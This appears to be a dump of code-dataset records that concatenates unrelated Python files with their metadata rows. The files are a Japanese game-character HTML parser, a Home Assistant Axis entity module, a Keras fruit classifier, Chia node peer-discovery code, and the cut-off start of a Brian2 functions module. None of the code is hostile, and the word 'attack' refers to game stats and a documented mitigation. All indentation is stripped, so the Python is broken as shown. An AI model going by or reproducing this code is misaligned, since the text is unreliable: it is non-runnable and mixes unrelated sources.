# has attack
atk_str = parse_atk(text)
turn = parse_turns(text)
texts = []
texts_tmp = text.split("し、")
scope_guessing = None
for txt in texts_tmp:
if "味方全体" in txt:
scope_guessing = "味方全体"
elif "自分" in txt:
scope_guessing = "自分"
if "自分" not in txt and "味方全体" not in txt:
if scope_guessing:
txt = scope_guessing + txt
texts.extend(txt.split("さらに"))
buffs_eff = []
debuffs_eff = []
adj_buffs_eff = []
for t in texts:
b = parse_buff(t, turn)
d = parse_debuff(t, turn)
a = parse_adj_buff(t)
rhp = parse_recover_hp(t, turn)
rmp = parse_recover_mp(t, turn)
if b:
buffs_eff.append(b)
if rhp:
buffs_eff.append(rhp)
if rmp:
buffs_eff.append(rmp)
if d:
debuffs_eff.append(d)
if a:
adj_buffs_eff.append(a)
buffs_str = f"buffs=[{', '.join(buffs_eff)}],"
debuffs_str = f"debuffs=[{', '.join(debuffs_eff)}],"
adj_buffs_str = f"adj_buffs=[{', '.join(adj_buffs_eff)}],"
# print(buffs_str)
# print(debuffs_str)
if is_special:
special_str = "is_special=True,"
else:
m = re.match(r".+(MP:(\d+)).*", text, re.UNICODE)
if m:
mp = m.group(1)
mp_str = f"mp={mp},"
skill_dec_str = f"Skill({is_fast_str} {atk_str} {special_str} {mp_str} {buffs_str} {debuffs_str} {adj_buffs_str})"
return skill_dec_str
def gen_passive_skill_str(text):
b = parse_passive_buff(text)
print(text)
return b
def gen_counter_hp_str(text):
m = re.match(r".*】.*カウンター発生時.*通常攻撃.*(HP|HP)回復", text, re.UNICODE)
if m:
return "counter_hp=True,"
return ""
def gen_killer_str(text):
m = re.match(r".*】(\w+)の敵を攻撃.*(\d+)[%%]上昇.*", text, re.UNICODE)
if m:
killer = m.group(1)
if killer == "猛牛系":
return "killer=Killer.bull, "
elif killer == "巨人系":
return "killer=Killer.giant, "
elif killer == "魔獣系":
return "killer=Killer.beast, "
elif killer == "精霊系":
return "killer=Killer.fairy, "
elif killer == "植物系":
return "killer=Killer.plant, "
elif killer == "昆虫系":
return "killer=Killer.bug, "
elif killer == "堅鉱系":
return "killer=Killer.rock, "
elif killer == "蠕獣系":
return "killer=Killer.worm, "
elif killer == "竜系":
return "killer=Killer.dragon, "
elif killer == "水棲系":
return "killer=Killer.aquatic, "
elif killer == "妖鬼系":
return "killer=Killer.orge, "
elif killer == "幽魔系":
return "killer=Killer.undead, "
else:
raise ValueError
return ""
def parsing_chara(html_text):
parser = HtmlParser(html_text)
chara = Chara()
basics_table = parser.get_next_div()
for tr in basics_table.table.find_all('tr'):
col = tr.th.text
val = tr.td.text
if col == "名称":
chara.name = val
if col == "カテゴリ":
if val == "冒険者":
chara.job = "Adventurer"
elif val == "アシスト":
chara.job = "Assist"
limit_break_status_table = parser.get_next_div()
while "最大値" not in limit_break_status_table.text:
limit_break_status_table = parser.get_next_div()
#limit_break_status_table = parser.get_next_div()
for tr in limit_break_status_table.table.find_all('tr'):
if tr.td is None:
continue
col = tr.td
val = col.find_next_sibling()
print(col.text, val.text)
if col.text == "HP":
chara.hp = int(val.text)
if col.text == "MP":
chara.mp = int(val.text)
if col.text == "物攻":
chara.str = int(val.text.split("(")[0])
if col.text == "魔攻":
chara.mag = int(val.text.split("(")[0])
if col.text == "防御":
chara.end = int(val.text.split("(")[0])
if col.text == "器用":
chara.dex = int(val.text.split("(")[0])
if col.text == "敏捷":
chara.agi = int(val.text.split("(")[0])
all_skills = []
all_passive_skills = []
if chara.job == "Adventurer":
status_table_no_used = parser.get_next_div()
special_skill = parser.get_next_div()
special_skill_dec_str = gen_skill_str(special_skill.text, True)
skills = parser.get_next_div()
for s in skills.find_all("td"):
skill_str = gen_skill_str(s.text)
all_skills.append(skill_str)
if chara.job == "Adventurer":
all_skills.append(special_skill_dec_str)
concated_skills = ',\n '.join(all_skills)
chara.skills = f"skills=[{concated_skills}],"
if chara.job == "Adventurer":
passive_skills = parser.get_next_div()
for s in passive_skills.find_all("td"):
passive_skill_str = gen_passive_skill_str(s.text)
if passive_skill_str:
all_passive_skills.append(passive_skill_str)
if chara.killer == "":
chara.killer = gen_killer_str(s.text)
if chara.counter_hp == "":
chara.counter_hp = gen_counter_hp_str(s.text)
concated_passive_skills = ',\n '.join(all_passive_skills)
chara.passive_skills = f"passive_skills=[Skill(buffs=[{concated_passive_skills}])],"
template = jinja2.Template("""
{{chara.job}}("{{chara.name}}", {{chara.hp}}, {{chara.mp}},
{{chara.str}}, {{chara.end}}, {{chara.dex}}, {{chara.agi}}, {{chara.mag}},
{{chara.skills}}
{{chara.passive_skills}}
{{chara.killer}}
{{chara.counter_hp}}
),
""")
if chara.job == "Adventurer":
out = template.render(chara=chara)
print(out)
else:
for i, s in enumerate(all_skills):
print("======================================================")
if i == 0:
continue
elif i == 1:
print("LV 60~76:")
elif i == 2:
print("LV 80:")
else:
raise
chara.skills = f"skill={s}"
out = template.render(chara=chara)
print(out)
def parsing_chara_from_web(http_url):
r = requests.get(http_url)
html_text = r.text
parsing_chara(html_text)
if __name__ == '__main__':
with open('tmp.html', 'r', encoding="utf-8") as f:
html_text_to_test = f.read()
parsing_chara(html_text_to_test)
| gen_chara.py | 18,267 | has attack print(buffs_str) print(debuffs_str)limit_break_status_table = parser.get_next_div() | 94 | en | 0.259444 |
"""Base classes for Axis entities."""
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import DeviceInfo, Entity
from .const import DOMAIN as AXIS_DOMAIN
class AxisEntityBase(Entity):
"""Base common to all Axis entities."""
def __init__(self, device):
"""Initialize the Axis event."""
self.device = device
self._attr_device_info = DeviceInfo(
identifiers={(AXIS_DOMAIN, device.unique_id)}
)
async def async_added_to_hass(self):
"""Subscribe device events."""
self.async_on_remove(
async_dispatcher_connect(
self.hass, self.device.signal_reachable, self.update_callback
)
)
@property
def available(self):
"""Return True if device is available."""
return self.device.available
@callback
def update_callback(self, no_delay=None):
"""Update the entities state."""
self.async_write_ha_state()
class AxisEventBase(AxisEntityBase):
"""Base common to all Axis entities from event stream."""
_attr_should_poll = False
def __init__(self, event, device):
"""Initialize the Axis event."""
super().__init__(device)
self.event = event
self._attr_name = f"{device.name} {event.TYPE} {event.id}"
self._attr_unique_id = f"{device.unique_id}-{event.topic}-{event.id}"
self._attr_device_class = event.CLASS
async def async_added_to_hass(self) -> None:
"""Subscribe sensors events."""
self.event.register_callback(self.update_callback)
await super().async_added_to_hass()
async def async_will_remove_from_hass(self) -> None:
"""Disconnect device object when removed."""
self.event.remove_callback(self.update_callback)
| homeassistant/components/axis/axis_base.py | 1,887 | Base common to all Axis entities.
Base common to all Axis entities from event stream.
Initialize the Axis event.
Initialize the Axis event.
Return True if device is available.
Update the entities state.
Base classes for Axis entities. | 234 | en | 0.861874 |
'''
This module has all relevant functions to make predictions using a previously
trained model.
'''
import os
import numpy as np
import tensorflow.keras as keras
from tensorflow.keras.preprocessing import image
from tensorflow.keras.models import load_model
import cv2
model = load_model('../models/app_ban_ora_selftrained')
def decode_prediction(prediction):
'''
Decodes predictions and returns a result string.
'''
if np.where(prediction == np.amax(prediction))[1] == 2:
prob_orange = round(prediction[0][2] * 100, 2)
label = f"I am {prob_orange} % sure this is an orange \N{tangerine}!"
if np.where(prediction == np.amax(prediction))[1] == 1:
prob_banana = round(prediction[0][1] * 100, 2)
label = f"I am {prob_banana} % sure this is a banana \N{banana}!"
if np.where(prediction == np.amax(prediction))[1] == 0:
prob_apple = round(prediction[0][0] * 100, 2)
label = f"I am {prob_apple} % sure this is an apple \N{red apple}!"
return label
def predict(frame):
'''
Takes a frame as input, makes a prediction, decoodes it
and returns a result string.
'''
img = cv2.resize(frame, (224, 224))
img = cv2.cvtColor(np.float32(img), cv2.COLOR_BGR2RGB)
img = img.reshape(1, 224, 224, 3)
prediction = model.predict(img)
label = decode_prediction(prediction)
return label
| src/predict.py | 1,384 | Decodes predictions and returns a result string.
Takes a frame as input, makes a prediction, decoodes it
and returns a result string.
This module has all relevant functions to make predictions using a previously
trained model. | 226 | en | 0.850624 |
import asyncio
import math
import time
import traceback
from pathlib import Path
from random import Random
from secrets import randbits
from typing import Dict, Optional, List, Set
import aiosqlite
import chia.server.ws_connection as ws
import dns.asyncresolver
from chia.protocols import full_node_protocol, introducer_protocol
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.server.address_manager import AddressManager, ExtendedPeerInfo
from chia.server.address_manager_store import AddressManagerStore
from chia.server.outbound_message import NodeType, make_msg
from chia.server.server import ChiaServer
from chia.types.peer_info import PeerInfo, TimestampedPeerInfo
from chia.util.hash import std_hash
from chia.util.ints import uint64
from chia.util.path import mkdir, path_from_root
MAX_PEERS_RECEIVED_PER_REQUEST = 1000
MAX_TOTAL_PEERS_RECEIVED = 3000
MAX_CONCURRENT_OUTBOUND_CONNECTIONS = 70
NETWORK_ID_DEFAULT_PORTS = {
"mainnet": 8444,
"testnet7": 58444,
"testnet8": 58445,
}
class FullNodeDiscovery:
resolver: Optional[dns.asyncresolver.Resolver]
def __init__(
self,
server: ChiaServer,
root_path: Path,
target_outbound_count: int,
peer_db_path: str,
introducer_info: Optional[Dict],
dns_servers: List[str],
peer_connect_interval: int,
selected_network: str,
default_port: Optional[int],
log,
):
self.server: ChiaServer = server
self.message_queue: asyncio.Queue = asyncio.Queue()
self.is_closed = False
self.target_outbound_count = target_outbound_count
# This is a double check to make sure testnet and mainnet peer databases never mix up.
# If the network is not 'mainnet', it names the peer db differently, including the selected_network.
if selected_network != "mainnet":
if not peer_db_path.endswith(".sqlite"):
raise ValueError(f"Invalid path for peer table db: {peer_db_path}. Make the path end with .sqlite")
peer_db_path = peer_db_path[:-7] + "_" + selected_network + ".sqlite"
self.peer_db_path = path_from_root(root_path, peer_db_path)
self.dns_servers = dns_servers
if introducer_info is not None:
self.introducer_info: Optional[PeerInfo] = PeerInfo(
introducer_info["host"],
introducer_info["port"],
)
else:
self.introducer_info = None
self.peer_connect_interval = peer_connect_interval
self.log = log
self.relay_queue = None
self.address_manager: Optional[AddressManager] = None
self.connection_time_pretest: Dict = {}
self.received_count_from_peers: Dict = {}
self.lock = asyncio.Lock()
self.connect_peers_task: Optional[asyncio.Task] = None
self.serialize_task: Optional[asyncio.Task] = None
self.cleanup_task: Optional[asyncio.Task] = None
self.initial_wait: int = 0
try:
self.resolver: Optional[dns.asyncresolver.Resolver] = dns.asyncresolver.Resolver()
except Exception:
self.resolver = None
self.log.exception("Error initializing asyncresolver")
self.pending_outbound_connections: Set[str] = set()
self.pending_tasks: Set[asyncio.Task] = set()
self.default_port: Optional[int] = default_port
if default_port is None and selected_network in NETWORK_ID_DEFAULT_PORTS:
self.default_port = NETWORK_ID_DEFAULT_PORTS[selected_network]
async def initialize_address_manager(self) -> None:
mkdir(self.peer_db_path.parent)
self.connection = await aiosqlite.connect(self.peer_db_path)
await self.connection.execute("pragma journal_mode=wal")
await self.connection.execute("pragma synchronous=OFF")
self.address_manager_store = await AddressManagerStore.create(self.connection)
if not await self.address_manager_store.is_empty():
self.address_manager = await self.address_manager_store.deserialize()
else:
await self.address_manager_store.clear()
self.address_manager = AddressManager()
self.server.set_received_message_callback(self.update_peer_timestamp_on_message)
async def start_tasks(self) -> None:
random = Random()
self.connect_peers_task = asyncio.create_task(self._connect_to_peers(random))
self.serialize_task = asyncio.create_task(self._periodically_serialize(random))
self.cleanup_task = asyncio.create_task(self._periodically_cleanup())
async def _close_common(self) -> None:
self.is_closed = True
self.cancel_task_safe(self.connect_peers_task)
self.cancel_task_safe(self.serialize_task)
self.cancel_task_safe(self.cleanup_task)
for t in self.pending_tasks:
self.cancel_task_safe(t)
if len(self.pending_tasks) > 0:
await asyncio.wait(self.pending_tasks)
await self.connection.close()
def cancel_task_safe(self, task: Optional[asyncio.Task]):
if task is not None:
try:
task.cancel()
except Exception as e:
self.log.error(f"Error while canceling task.{e} {task}")
def add_message(self, message, data):
self.message_queue.put_nowait((message, data))
async def on_connect(self, peer: ws.WSChiaConnection):
if (
peer.is_outbound is False
and peer.peer_server_port is not None
and peer.connection_type is NodeType.FULL_NODE
and self.server._local_type is NodeType.FULL_NODE
and self.address_manager is not None
):
timestamped_peer_info = TimestampedPeerInfo(
peer.peer_host,
peer.peer_server_port,
uint64(int(time.time())),
)
await self.address_manager.add_to_new_table([timestamped_peer_info], peer.get_peer_info(), 0)
if self.relay_queue is not None:
self.relay_queue.put_nowait((timestamped_peer_info, 1))
if (
peer.is_outbound
and peer.peer_server_port is not None
and peer.connection_type is NodeType.FULL_NODE
and (self.server._local_type is NodeType.FULL_NODE or self.server._local_type is NodeType.WALLET)
and self.address_manager is not None
):
msg = make_msg(ProtocolMessageTypes.request_peers, full_node_protocol.RequestPeers())
await peer.send_message(msg)
# Updates timestamps each time we receive a message for outbound connections.
async def update_peer_timestamp_on_message(self, peer: ws.WSChiaConnection):
if (
peer.is_outbound
and peer.peer_server_port is not None
and peer.connection_type is NodeType.FULL_NODE
and self.server._local_type is NodeType.FULL_NODE
and self.address_manager is not None
):
peer_info = peer.get_peer_info()
if peer_info is None:
return None
if peer_info.host not in self.connection_time_pretest:
self.connection_time_pretest[peer_info.host] = time.time()
if time.time() - self.connection_time_pretest[peer_info.host] > 600:
self.connection_time_pretest[peer_info.host] = time.time()
await self.address_manager.connect(peer_info)
def _num_needed_peers(self) -> int:
target = self.target_outbound_count
outgoing = len(self.server.get_full_node_outgoing_connections())
return max(0, target - outgoing)
"""
Uses the Poisson distribution to determine the next time
when we'll initiate a feeler connection.
(https://en.wikipedia.org/wiki/Poisson_distribution)
"""
def _poisson_next_send(self, now, avg_interval_seconds, random):
return now + (
math.log(random.randrange(1 << 48) * -0.0000000000000035527136788 + 1) * avg_interval_seconds * -1000000.0
+ 0.5
)
async def _introducer_client(self):
if self.introducer_info is None:
return None
async def on_connect(peer: ws.WSChiaConnection):
msg = make_msg(ProtocolMessageTypes.request_peers_introducer, introducer_protocol.RequestPeersIntroducer())
await peer.send_message(msg)
await self.server.start_client(self.introducer_info, on_connect)
async def _query_dns(self, dns_address):
try:
if self.default_port is None:
self.log.error(
"Network id not supported in NETWORK_ID_DEFAULT_PORTS neither in config. Skipping DNS query."
)
return
if self.resolver is None:
self.log.warn("Skipping DNS query: asyncresolver not initialized.")
return
for rdtype in ["A", "AAAA"]:
peers: List[TimestampedPeerInfo] = []
result = await self.resolver.resolve(qname=dns_address, rdtype=rdtype, lifetime=30)
for ip in result:
peers.append(
TimestampedPeerInfo(
ip.to_text(),
self.default_port,
0,
)
)
self.log.info(f"Received {len(peers)} peers from DNS seeder, using rdtype = {rdtype}.")
if len(peers) > 0:
await self._respond_peers_common(full_node_protocol.RespondPeers(peers), None, False)
except Exception as e:
self.log.warn(f"querying DNS introducer failed: {e}")
async def start_client_async(self, addr: PeerInfo, is_feeler: bool) -> None:
try:
if self.address_manager is None:
return
self.pending_outbound_connections.add(addr.host)
client_connected = await self.server.start_client(
addr,
on_connect=self.server.on_connect,
is_feeler=is_feeler,
)
if self.server.is_duplicate_or_self_connection(addr):
# Mark it as a softer attempt, without counting the failures.
await self.address_manager.attempt(addr, False)
else:
if client_connected is True:
await self.address_manager.mark_good(addr)
await self.address_manager.connect(addr)
else:
await self.address_manager.attempt(addr, True)
self.pending_outbound_connections.remove(addr.host)
except Exception as e:
if addr.host in self.pending_outbound_connections:
self.pending_outbound_connections.remove(addr.host)
self.log.error(f"Exception in create outbound connections: {e}")
self.log.error(f"Traceback: {traceback.format_exc()}")
async def _connect_to_peers(self, random) -> None:
next_feeler = self._poisson_next_send(time.time() * 1000 * 1000, 240, random)
retry_introducers = False
introducer_attempts: int = 0
dns_server_index: int = 0
local_peerinfo: Optional[PeerInfo] = await self.server.get_peer_info()
last_timestamp_local_info: uint64 = uint64(int(time.time()))
last_collision_timestamp = 0
if self.initial_wait > 0:
await asyncio.sleep(self.initial_wait)
introducer_backoff = 1
while not self.is_closed:
try:
assert self.address_manager is not None
# We don't know any address, connect to the introducer to get some.
size = await self.address_manager.size()
if size == 0 or retry_introducers:
try:
await asyncio.sleep(introducer_backoff)
except asyncio.CancelledError:
return None
# Run dual between DNS servers and introducers. One time query DNS server,
# next two times query the introducer.
if introducer_attempts % 3 == 0 and len(self.dns_servers) > 0:
dns_address = self.dns_servers[dns_server_index]
dns_server_index = (dns_server_index + 1) % len(self.dns_servers)
await self._query_dns(dns_address)
else:
await self._introducer_client()
# there's some delay between receiving the peers from the
# introducer until they get incorporated to prevent this
# loop for running one more time. Add this delay to ensure
# that once we get peers, we stop contacting the introducer.
try:
await asyncio.sleep(5)
except asyncio.CancelledError:
return None
retry_introducers = False
introducer_attempts += 1
# keep doubling the introducer delay until we reach 5
# minutes
if introducer_backoff < 300:
introducer_backoff *= 2
continue
else:
introducer_backoff = 1
# Only connect out to one peer per network group (/16 for IPv4).
groups = set()
full_node_connected = self.server.get_full_node_outgoing_connections()
connected = [c.get_peer_info() for c in full_node_connected]
connected = [c for c in connected if c is not None]
for conn in full_node_connected:
peer = conn.get_peer_info()
if peer is None:
continue
group = peer.get_group()
groups.add(group)
# Feeler Connections
#
# Design goals:
# * Increase the number of connectable addresses in the tried table.
#
# Method:
# * Choose a random address from new and attempt to connect to it if we can connect
# successfully it is added to tried.
# * Start attempting feeler connections only after node finishes making outbound
# connections.
# * Only make a feeler connection once every few minutes.
is_feeler = False
has_collision = False
if self._num_needed_peers() == 0:
if time.time() * 1000 * 1000 > next_feeler:
next_feeler = self._poisson_next_send(time.time() * 1000 * 1000, 240, random)
is_feeler = True
await self.address_manager.resolve_tried_collisions()
tries = 0
now = time.time()
got_peer = False
addr: Optional[PeerInfo] = None
max_tries = 50
if len(groups) < 3:
max_tries = 10
elif len(groups) <= 5:
max_tries = 25
select_peer_interval = max(0.1, len(groups) * 0.25)
while not got_peer and not self.is_closed:
self.log.debug(f"Address manager query count: {tries}. Query limit: {max_tries}")
try:
await asyncio.sleep(select_peer_interval)
except asyncio.CancelledError:
return None
tries += 1
if tries > max_tries:
addr = None
retry_introducers = True
break
info: Optional[ExtendedPeerInfo] = await self.address_manager.select_tried_collision()
if info is None or time.time() - last_collision_timestamp <= 60:
info = await self.address_manager.select_peer(is_feeler)
else:
has_collision = True
last_collision_timestamp = int(time.time())
if info is None:
if not is_feeler:
retry_introducers = True
break
# Require outbound connections, other than feelers,
# to be to distinct network groups.
addr = info.peer_info
if has_collision:
break
if addr is not None and not addr.is_valid():
addr = None
continue
if not is_feeler and addr.get_group() in groups:
addr = None
continue
if addr in connected:
addr = None
continue
# attempt a node once per 30 minutes.
if now - info.last_try < 1800:
continue
if time.time() - last_timestamp_local_info > 1800 or local_peerinfo is None:
local_peerinfo = await self.server.get_peer_info()
last_timestamp_local_info = uint64(int(time.time()))
if local_peerinfo is not None and addr == local_peerinfo:
continue
got_peer = True
self.log.debug(f"Addrman selected address: {addr}.")
disconnect_after_handshake = is_feeler
extra_peers_needed = self._num_needed_peers()
if extra_peers_needed == 0:
disconnect_after_handshake = True
retry_introducers = False
self.log.debug(f"Num peers needed: {extra_peers_needed}")
initiate_connection = extra_peers_needed > 0 or has_collision or is_feeler
connect_peer_interval = max(0.25, len(groups) * 0.5)
if not initiate_connection:
connect_peer_interval += 15
connect_peer_interval = min(connect_peer_interval, self.peer_connect_interval)
if addr is not None and initiate_connection and addr.host not in self.pending_outbound_connections:
if len(self.pending_outbound_connections) >= MAX_CONCURRENT_OUTBOUND_CONNECTIONS:
self.log.debug("Max concurrent outbound connections reached. waiting")
await asyncio.wait(self.pending_tasks, return_when=asyncio.FIRST_COMPLETED)
self.pending_tasks.add(
asyncio.create_task(self.start_client_async(addr, disconnect_after_handshake))
)
await asyncio.sleep(connect_peer_interval)
# prune completed connect tasks
self.pending_task = set(filter(lambda t: not t.done(), self.pending_tasks))
except Exception as e:
self.log.error(f"Exception in create outbound connections: {e}")
self.log.error(f"Traceback: {traceback.format_exc()}")
async def _periodically_serialize(self, random: Random):
while not self.is_closed:
if self.address_manager is None:
await asyncio.sleep(10)
continue
serialize_interval = random.randint(15 * 60, 30 * 60)
await asyncio.sleep(serialize_interval)
async with self.address_manager.lock:
await self.address_manager_store.serialize(self.address_manager)
async def _periodically_cleanup(self) -> None:
while not self.is_closed:
# Removes entries with timestamp worse than 14 days ago
# and with a high number of failed attempts.
# Most likely, the peer left the network,
# so we can save space in the peer tables.
cleanup_interval = 1800
max_timestamp_difference = 14 * 3600 * 24
max_consecutive_failures = 10
await asyncio.sleep(cleanup_interval)
# Perform the cleanup only if we have at least 3 connections.
full_node_connected = self.server.get_full_node_connections()
connected = [c.get_peer_info() for c in full_node_connected]
connected = [c for c in connected if c is not None]
if self.address_manager is not None and len(connected) >= 3:
async with self.address_manager.lock:
self.address_manager.cleanup(max_timestamp_difference, max_consecutive_failures)
async def _respond_peers_common(self, request, peer_src, is_full_node) -> None:
# Check if we got the peers from a full node or from the introducer.
peers_adjusted_timestamp = []
is_misbehaving = False
if len(request.peer_list) > MAX_PEERS_RECEIVED_PER_REQUEST:
is_misbehaving = True
if is_full_node:
if peer_src is None:
return None
async with self.lock:
if peer_src.host not in self.received_count_from_peers:
self.received_count_from_peers[peer_src.host] = 0
self.received_count_from_peers[peer_src.host] += len(request.peer_list)
if self.received_count_from_peers[peer_src.host] > MAX_TOTAL_PEERS_RECEIVED:
is_misbehaving = True
if is_misbehaving:
return None
for peer in request.peer_list:
if peer.timestamp < 100000000 or peer.timestamp > time.time() + 10 * 60:
# Invalid timestamp, predefine a bad one.
current_peer = TimestampedPeerInfo(
peer.host,
peer.port,
uint64(int(time.time() - 5 * 24 * 60 * 60)),
)
else:
current_peer = peer
if not is_full_node:
current_peer = TimestampedPeerInfo(
peer.host,
peer.port,
uint64(0),
)
peers_adjusted_timestamp.append(current_peer)
assert self.address_manager is not None
if is_full_node:
await self.address_manager.add_to_new_table(peers_adjusted_timestamp, peer_src, 2 * 60 * 60)
else:
await self.address_manager.add_to_new_table(peers_adjusted_timestamp, None, 0)
class FullNodePeers(FullNodeDiscovery):
self_advertise_task: Optional[asyncio.Task] = None
address_relay_task: Optional[asyncio.Task] = None
def __init__(
self,
server,
root_path,
max_inbound_count,
target_outbound_count,
peer_db_path,
introducer_info,
dns_servers,
peer_connect_interval,
selected_network,
default_port,
log,
):
super().__init__(
server,
root_path,
target_outbound_count,
peer_db_path,
introducer_info,
dns_servers,
peer_connect_interval,
selected_network,
default_port,
log,
)
self.relay_queue = asyncio.Queue()
self.neighbour_known_peers = {}
self.key = randbits(256)
async def start(self):
await self.initialize_address_manager()
self.self_advertise_task = asyncio.create_task(self._periodically_self_advertise_and_clean_data())
self.address_relay_task = asyncio.create_task(self._address_relay())
await self.start_tasks()
async def close(self):
await self._close_common()
self.cancel_task_safe(self.self_advertise_task)
self.cancel_task_safe(self.address_relay_task)
async def _periodically_self_advertise_and_clean_data(self):
while not self.is_closed:
try:
try:
await asyncio.sleep(24 * 3600)
except asyncio.CancelledError:
return None
# Clean up known nodes for neighbours every 24 hours.
async with self.lock:
for neighbour in list(self.neighbour_known_peers.keys()):
self.neighbour_known_peers[neighbour].clear()
# Self advertise every 24 hours.
peer = await self.server.get_peer_info()
if peer is None:
continue
timestamped_peer = [
TimestampedPeerInfo(
peer.host,
peer.port,
uint64(int(time.time())),
)
]
msg = make_msg(
ProtocolMessageTypes.respond_peers,
full_node_protocol.RespondPeers(timestamped_peer),
)
await self.server.send_to_all([msg], NodeType.FULL_NODE)
async with self.lock:
for host in list(self.received_count_from_peers.keys()):
self.received_count_from_peers[host] = 0
except Exception as e:
self.log.error(f"Exception in self advertise: {e}")
self.log.error(f"Traceback: {traceback.format_exc()}")
async def add_peers_neighbour(self, peers, neighbour_info):
neighbour_data = (neighbour_info.host, neighbour_info.port)
async with self.lock:
for peer in peers:
if neighbour_data not in self.neighbour_known_peers:
self.neighbour_known_peers[neighbour_data] = set()
if peer.host not in self.neighbour_known_peers[neighbour_data]:
self.neighbour_known_peers[neighbour_data].add(peer.host)
async def request_peers(self, peer_info: PeerInfo):
try:
# Prevent a fingerprint attack: do not send peers to inbound connections.
# This asymmetric behavior for inbound and outbound connections was introduced
# to prevent a fingerprinting attack: an attacker can send specific fake addresses
# to users' AddrMan and later request them by sending getaddr messages.
# Making nodes which are behind NAT and can only make outgoing connections ignore
# the request_peers message mitigates the attack.
if self.address_manager is None:
return None
peers = await self.address_manager.get_peers()
await self.add_peers_neighbour(peers, peer_info)
msg = make_msg(
ProtocolMessageTypes.respond_peers,
full_node_protocol.RespondPeers(peers),
)
return msg
except Exception as e:
self.log.error(f"Request peers exception: {e}")
async def respond_peers(self, request, peer_src, is_full_node):
try:
await self._respond_peers_common(request, peer_src, is_full_node)
if is_full_node:
await self.add_peers_neighbour(request.peer_list, peer_src)
if len(request.peer_list) == 1 and self.relay_queue is not None:
peer = request.peer_list[0]
if peer.timestamp > time.time() - 60 * 10:
self.relay_queue.put_nowait((peer, 2))
except Exception as e:
self.log.error(f"Respond peers exception: {e}. Traceback: {traceback.format_exc()}")
async def _address_relay(self):
while not self.is_closed:
try:
try:
relay_peer, num_peers = await self.relay_queue.get()
except asyncio.CancelledError:
return None
relay_peer_info = PeerInfo(relay_peer.host, relay_peer.port)
if not relay_peer_info.is_valid():
continue
# https://en.bitcoin.it/wiki/Satoshi_Client_Node_Discovery#Address_Relay
connections = self.server.get_full_node_connections()
hashes = []
cur_day = int(time.time()) // (24 * 60 * 60)
for connection in connections:
peer_info = connection.get_peer_info()
if peer_info is None:
continue
cur_hash = int.from_bytes(
bytes(
std_hash(
self.key.to_bytes(32, byteorder="big")
+ peer_info.get_key()
+ cur_day.to_bytes(3, byteorder="big")
)
),
byteorder="big",
)
hashes.append((cur_hash, connection))
hashes.sort(key=lambda x: x[0])
for index, (_, connection) in enumerate(hashes):
if index >= num_peers:
break
peer_info = connection.get_peer_info()
pair = (peer_info.host, peer_info.port)
async with self.lock:
if pair in self.neighbour_known_peers and relay_peer.host in self.neighbour_known_peers[pair]:
continue
if pair not in self.neighbour_known_peers:
self.neighbour_known_peers[pair] = set()
self.neighbour_known_peers[pair].add(relay_peer.host)
if connection.peer_node_id is None:
continue
msg = make_msg(
ProtocolMessageTypes.respond_peers,
full_node_protocol.RespondPeers([relay_peer]),
)
await connection.send_message(msg)
except Exception as e:
self.log.error(f"Exception in address relay: {e}")
self.log.error(f"Traceback: {traceback.format_exc()}")
class WalletPeers(FullNodeDiscovery):
def __init__(
self,
server,
root_path,
target_outbound_count,
peer_db_path,
introducer_info,
dns_servers,
peer_connect_interval,
selected_network,
default_port,
log,
) -> None:
super().__init__(
server,
root_path,
target_outbound_count,
peer_db_path,
introducer_info,
dns_servers,
peer_connect_interval,
selected_network,
default_port,
log,
)
async def start(self) -> None:
self.initial_wait = 60
await self.initialize_address_manager()
await self.start_tasks()
async def ensure_is_closed(self) -> None:
if self.is_closed:
return None
await self._close_common()
async def respond_peers(self, request, peer_src, is_full_node) -> None:
await self._respond_peers_common(request, peer_src, is_full_node)
| chia/server/node_discovery.py | 31,433 | This is a double check to make sure testnet and mainnet peer databases never mix up. If the network is not 'mainnet', it names the peer db differently, including the selected_network. Updates timestamps each time we receive a message for outbound connections. Mark it as a softer attempt, without counting the failures. We don't know any address, connect to the introducer to get some. Run dual between DNS servers and introducers. One time query DNS server, next two times query the introducer. there's some delay between receiving the peers from the introducer until they get incorporated to prevent this loop for running one more time. Add this delay to ensure that once we get peers, we stop contacting the introducer. keep doubling the introducer delay until we reach 5 minutes Only connect out to one peer per network group (/16 for IPv4). Feeler Connections Design goals: * Increase the number of connectable addresses in the tried table. Method: * Choose a random address from new and attempt to connect to it if we can connect successfully it is added to tried. * Start attempting feeler connections only after node finishes making outbound connections. * Only make a feeler connection once every few minutes. Require outbound connections, other than feelers, to be to distinct network groups. attempt a node once per 30 minutes. prune completed connect tasks Removes entries with timestamp worse than 14 days ago and with a high number of failed attempts. Most likely, the peer left the network, so we can save space in the peer tables. Perform the cleanup only if we have at least 3 connections. Check if we got the peers from a full node or from the introducer. Invalid timestamp, predefine a bad one. Clean up known nodes for neighbours every 24 hours. Self advertise every 24 hours. Prevent a fingerprint attack: do not send peers to inbound connections. This asymmetric behavior for inbound and outbound connections was introduced to prevent a fingerprinting attack: an attacker can send specific fake addresses to users' AddrMan and later request them by sending getaddr messages. Making nodes which are behind NAT and can only make outgoing connections ignore the request_peers message mitigates the attack. https://en.bitcoin.it/wiki/Satoshi_Client_Node_DiscoveryAddress_Relay | 2,294 | en | 0.924678 |
from collections.abc import Mapping
import inspect
import types
from typing import Callable
import numpy as np
import sympy
from sympy.codegen import cfunctions as sympy_cfunctions
from numpy.random import randn, rand
from sympy import Function as sympy_Function
from sympy import S
import brian2.units.unitsafefunctions as unitsafe
from brian2.core.preferences import prefs
from brian2.core.variables import Constant
from brian2.units.fundamentalunits import (fail_for_dimension_mismatch,
Quantity, get_dimensions,
DIMENSIONLESS, is_dimensionless)
from brian2.units.allunits import second
__all__ = ['DEFAULT_FUNCTIONS', 'Function', 'implementation', 'declare_types']
BRIAN_DTYPES = ['boolean', 'integer', 'float']
VALID_ARG_TYPES = BRIAN_DTYPES+['any']
VALID_RETURN_TYPES = BRIAN_DTYPES+['highest']
def declare_types(**types):
'''
Decorator to declare argument and result types for a function
Usage is similar to `check_units` except that types must be one of ``{VALID_ARG_TYPES}``
and the result type must be one of ``{VALID_RETURN_TYPES}``. Unspecified argument
types are assumed to be ``'all'`` (i.e. anything is permitted), and an unspecified
result type is assumed to be ``'float'``. Note that the ``'highest'`` option for
result type will give the highest type of its argument, e.g. if the arguments
were boolean and integer then the result would be integer, if the arguments were
integer and float it would be float.
'''
def annotate_function_with_types(f):
if hasattr(f, '_orig_arg_names'):
arg_names = f._orig_arg_names
